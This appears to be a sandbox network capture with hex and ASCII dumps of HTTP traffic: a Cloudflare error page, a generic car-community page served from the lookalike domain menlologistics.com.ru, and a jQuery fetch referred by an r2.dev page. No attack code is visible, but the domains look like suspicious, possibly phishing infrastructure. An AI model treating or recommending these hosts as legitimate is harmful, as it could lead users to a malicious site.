2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 73 76 67 20 3e 20 2e 65 79 65 2d 31 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 65 79 65 2d 31 20 33 73 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 73 76 67 20 3e 20 2e 65 79 65 2d 32 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 65 79 65 2d 32 20 33 73 20 30 2e 36 73 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a Data Ascii: teX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-siz
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 34 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 31 34 20 32 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 414 212" fill="none" xmlns="http://www.w3.org/2000/svg" >
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 33 34 43 31 33 30 2e 39 32 38 20 31 30 2e 34 32 38 38 20 31 32 38 2e 30 38 20 31 33 2e 32 37 37 20 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 32 2e 36 39 32 20 31 30 2e 32 33 34 37 48 31 32 36 2e 34 30 32 56 32 34 2e 30 33 34 35 48 31 32 32 2e 36 39 32 56 31 30 2e 32 33 34 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 38 35 2e 36 37 37 35 20 35 37 2e Data Ascii: 34C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC" /> <path d="M122.692 10.2347H126.402V24.0345H122.692V10.2347Z" fill="#0055DC" /> <path d="M85.6775 57.
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 43 31 33 36 2e 31 37 36 20 31 31 33 2e 32 38 31 20 31 33 36 2e 37 30 34 20 31 31 34 2e 35 35 35 20 31 33 37 2e 36 34 33 20 31 31 35 2e 34 39 34 43 31 33 38 2e 35 38 32 20 31 31 36 2e 34 33 33 20 31 33 39 2e 38 35 36 20 31 31 36 2e 39 36 31 20 31 34 31 2e 31 38 34 20 31 31 36 2e 39 36 31 43 31 34 31 2e 38 34 32 20 31 31 36 2e 39 36 32 20 31 34 32 2e 34 39 34 20 31 31 36 2e 38 33 33 20 31 34 33 2e 31 30 33 20 31 31 36 2e 35 38 32 43 31 34 33 2e 37 31 31 20 31 31 36 2e 33 33 31 20 31 34 34 2e 32 36 34 20 31 31 35 2e 39 36 32 20 31 34 34 2e 37 Data Ascii: ll="#0055DC" /> <path d="M136.176 111.953C136.176 113.281 136.704 114.555 137.643 115.494C138.582 116.433 139.856 116.961 141.184 116.961C141.842 116.962 142.494 116.833 143.103 116.582C143.711 116.331 144.264 115.962 144.7
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 33 38 34 20 31 31 31 2e 39 35 33 43 31 30 33 2e 33 38 34 20 31 31 32 2e 36 31 32 20 31 30 33 2e 35 31 33 20 31 31 33 2e 32 36 34 20 31 30 33 2e 37 36 36 20 31 31 33 2e 38 37 32 43 31 30 34 2e 30 31 38 20 31 31 34 2e 34 38 20 31 30 34 2e 33 38 37 20 31 31 35 2e 30 33 32 20 31 30 34 2e 38 35 33 20 31 31 35 2e 34 39 37 43 31 30 35 2e 33 31 39 20 31 31 35 2e 39 36 32 20 31 30 35 2e 38 37 32 20 31 31 36 2e 33 33 31 20 31 30 36 2e 34 38 31 20 31 31 36 2e 35 38 32 43 31 30 37 2e 30 38 39 20 31 31 36 2e 38 33 33 20 31 30 37 2e 37 34 31 20 31 31 36 2e 39 36 32 20 31 30 38 2e 33 39 39 20 31 31 36 2e 39 36 31 43 31 30 39 2e 37 32 38 20 31 31 36 2e 39 36 31 20 31 31 31 2e 30 30 31 20 31 31 36 2e 34 33 Data Ascii: h d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 113.872C104.018 114.48 104.387 115.032 104.853 115.497C105.319 115.962 105.872 116.331 106.481 116.582C107.089 116.833 107.741 116.962 108.399 116.961C109.728 116.961 111.001 116.43
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 38 2e 38 32 31 20 34 38 2e 39 35 31 36 43 31 30 34 2e 30 32 34 20 34 38 2e 39 35 31 36 20 31 30 30 2e 31 33 35 20 34 35 2e 30 36 32 37 20 31 30 30 2e 31 33 35 20 34 30 2e 32 36 35 35 43 31 30 30 2e 31 33 35 20 33 35 2e 34 36 38 34 20 31 30 34 2e 30 32 34 20 33 31 2e 35 37 39 35 20 31 30 38 2e 38 32 31 20 33 31 2e 35 37 39 35 43 31 31 33 2e 36 31 38 20 33 31 2e 35 37 39 35 20 31 31 37 2e 35 30 37 20 33 35 Data Ascii: 0055DC" stroke-width="2" stroke-miterlimit="10" /> <path d="M108.821 48.9516C104.024 48.9516 100.135 45.0627 100.135 40.2655C100.135 35.4684 104.024 31.5795 108.821 31.5795C113.618 31.5795 117.507 35
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 43 31 30 37 2e 37 31 37 20 33 38 2e 31 32 35 20 31 30 37 2e 32 37 34 20 33 39 2e 31 39 32 31 20 31 30 37 2e 32 37 31 20 34 30 2e 33 30 35 35 56 34 30 2e 33 30 35 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 38 34 2e 38 39 31 38 20 31 32 37 2e 35 38 31 48 31 36 34 2e 39 36 37 43 31 37 33 2e 33 34 35 20 31 32 37 2e 35 38 31 20 31 38 30 2e 31 33 37 20 31 33 34 2e 33 37 31 20 31 38 30 2e 31 33 37 20 31 34 32 2e 37 34 37 43 31 38 30 2e 31 33 37 20 31 35 31 2e 31 32 33 20 31 37 33 2e 33 34 35 20 31 35 37 2e 39 31 33 20 31 36 34 2e 39 36 37 20 31 35 37 2e 39 31 33 48 38 34 2e 38 39 Data Ascii: C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill="#6ECCE5" /> <path d="M84.8918 127.581H164.967C173.345 127.581 180.137 134.371 180.137 142.747C180.137 151.123 173.345 157.913 164.967 157.913H84.89
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 2d 6d 6f 64 65 3a 20 6d 75 6c 74 69 70 6c 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 30 37 34 20 31 34 32 2e 38 33 31 43 31 30 33 2e 30 33 38 20 31 34 35 2e 33 39 35 20 31 30 34 2e 30 32 31 20 31 34 37 2e 38 36 39 20 31 30 35 2e 38 30 38 20 31 34 39 2e 37 30 39 43 31 30 37 2e 35 39 35 20 31 35 31 2e 35 34 39 20 31 31 30 2e 30 33 39 20 31 35 32 2e 36 30 33 20 31 31 32 2e 36 30 34 20 31 35 32 2e 36 34 31 43 31 31 35 2e 31 36 38 20 31 35 32 2e 36 30 33 20 31 31 37 2e 36 31 33 20 31 35 31 2e 35 34 39 20 31 31 39 2e 34 20 31 34 39 2e 37 30 39 43 31 32 31 2e 31 38 37 20 31 34 37 2e 38 36 39 20 31 32 32 2e 31 37 20 31 34 35 2e 33 39 35 20 31 32 32 2e 31 33 34 20 31 34 32 2e Data Ascii: -mode: multiply"> <path d="M103.074 142.831C103.038 145.395 104.021 147.869 105.808 149.709C107.595 151.549 110.039 152.603 112.604 152.641C115.168 152.603 117.613 151.549 119.4 149.709C121.187 147.869 122.17 145.395 122.134 142.
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 38 37 2e 30 31 34 31 48 31 34 32 2e 31 37 37 56 39 31 2e 31 30 38 39 48 31 33 37 2e 30 38 37 56 38 37 2e 30 31 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 38 37 2e 30 31 34 31 48 31 33 34 2e 39 33 34 56 39 31 2e 31 30 38 39 48 31 32 39 2e 38 35 32 56 38 37 2e 30 31 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: fill="#0055DC" /> <path d="M137.087 87.0141H142.177V91.1089H137.087V87.0141Z" fill="#0055DC" /> <path d="M129.852 87.0141H134.934V91.1089H129.852V87.0141Z"

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:06:03 UTC	346	OUT	GET // HTTP/1.1 Host: menlologistics.com.ru Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-04 19:06:04 UTC	635	IN	HTTP/1.1 200 OK Date: Thu, 04 Jul 2024 19:06:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B05aGSQCq5TgPdQwgORVSMvYyGx87Vkl%2FgrgOiybBV0rmOxdde4Btlvk8qxnvXPIxLQg9o8MuQGQT0ubnFOC1usIJVp0AOFLF2n2oB1H69xnGDq6slLR7tQy%2FyoU1bq7NKduWsGBBDs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e163ee0a680f36-EWR alt-svc: h3=":443"; ma=86400
2024-07-04 19:06:04 UTC	734	IN	Data Raw: 31 62 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 75 6e 65 72 20 43 61 72 20 43 6f 6d 6d 75 6e 69 74 79 20 2d 20 6d 65 6e 6c 6f 6c 6f 67 69 73 74 69 63 73 2e 63 6f 6d 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e Data Ascii: 1bf9<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Tuner Car Community - menlologistics.com.ru</title> <link href="https://cdn.jsdelivr.n
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 34 33 61 34 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 Data Ascii: cover; color: white; padding: 150px 0; text-align: center; } .content-section { padding: 60px 0; } .footer { background: #343a40; color: whi
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 6e 6c 6f 6c 6f 67 69 73 74 69 63 73 2e 63 6f 6d 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 6e 6c 6f 6c 6f 67 69 73 74 69 63 73 2e 63 6f 6d 2e 72 75 2f 23 73 65 72 76 69 63 65 73 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 0d 0a 20 20 20 Data Ascii: <a class="nav-link" href="https://menlologistics.com.ru/#about">About</a> </li> <li class="nav-item"> <a class="nav-link" href="https://menlologistics.com.ru/#services">Services</a>
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 6d 61 69 6c 3d 22 65 38 38 62 38 37 38 36 39 63 38 39 38 62 39 63 61 38 38 35 38 64 38 36 38 34 38 37 38 34 38 37 38 66 38 31 39 62 39 63 38 31 38 62 39 62 63 36 38 62 38 37 38 35 63 36 39 61 39 64 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 37 37 37 2d 34 35 39 2d 32 38 37 35 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 48 61 76 65 20 79 6f 75 20 65 76 65 72 20 6e 6f 74 69 63 65 64 20 74 68 61 74 20 61 6e 79 62 6f 64 79 20 Data Ascii: mail="e88b87869c898b9ca8858d86848784878f819b9c818b9bc68b8785c69a9d">[email protected]</span></a> or call us at 777-459-2875.</p> <blockquote class="blockquote"> <p class="mb-0">Have you ever noticed that anybody
2024-07-04 19:06:04 UTC	1369	IN	Data Raw: 65 72 69 65 6e 63 65 66 65 72 72 61 72 69 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 34 2f 31 39 36 38 2d 44 6f 64 67 65 2d 43 68 61 72 67 65 72 2d 52 54 2e 6a 70 67 22 20 61 6c 74 3d 22 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 62 6f 64 79 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 22 3e 4d 6f 64 65 72 6e 20 53 75 70 65 72 63 61 72 73 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 Data Ascii: erienceferrari.com/wp-content/uploads/2024/04/1968-Dodge-Charger-RT.jpg" alt="Modern Supercar"> <div class="card-body"> <h5 class="card-title">Modern Supercars</h5> <p class="card-text
2024-07-04 19:06:04 UTC	959	IN	Data Raw: 2e 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 72 65 74 72 6f 2d 74 65 78 74 22 3e 45 73 74 61 62 6c 69 73 68 65 64 20 69 6e 20 31 39 35 32 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 6e 6c 6f 6c 6f 67 69 73 74 69 63 73 2e 63 6f 6d 2e 72 75 2f 23 70 72 69 76 61 63 79 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e Data Ascii: . All Rights Reserved.</p> <p class="retro-text">Established in 1952</p> <ul class="list-inline"> <li class="list-inline-item"> <a href="https://menlologistics.com.ru/#privacy">Privacy</a> </li>
2024-07-04 19:06:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-07-04 19:06:03 UTC	649	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-04 19:06:04 UTC	560	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Thu, 04 Jul 2024 19:06:03 GMT Age: 1524535 X-Served-By: cache-lga21931-LGA, cache-ewr18162-EWR X-Cache: HIT, HIT X-Cache-Hits: 55, 2 X-Timer: S1720119964.834739,VS0,VE0 Vary: Accept-Encoding
2024-07-04 19:06:04 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2024-07-04 19:06:04 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2024-07-04 19:06:04 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return 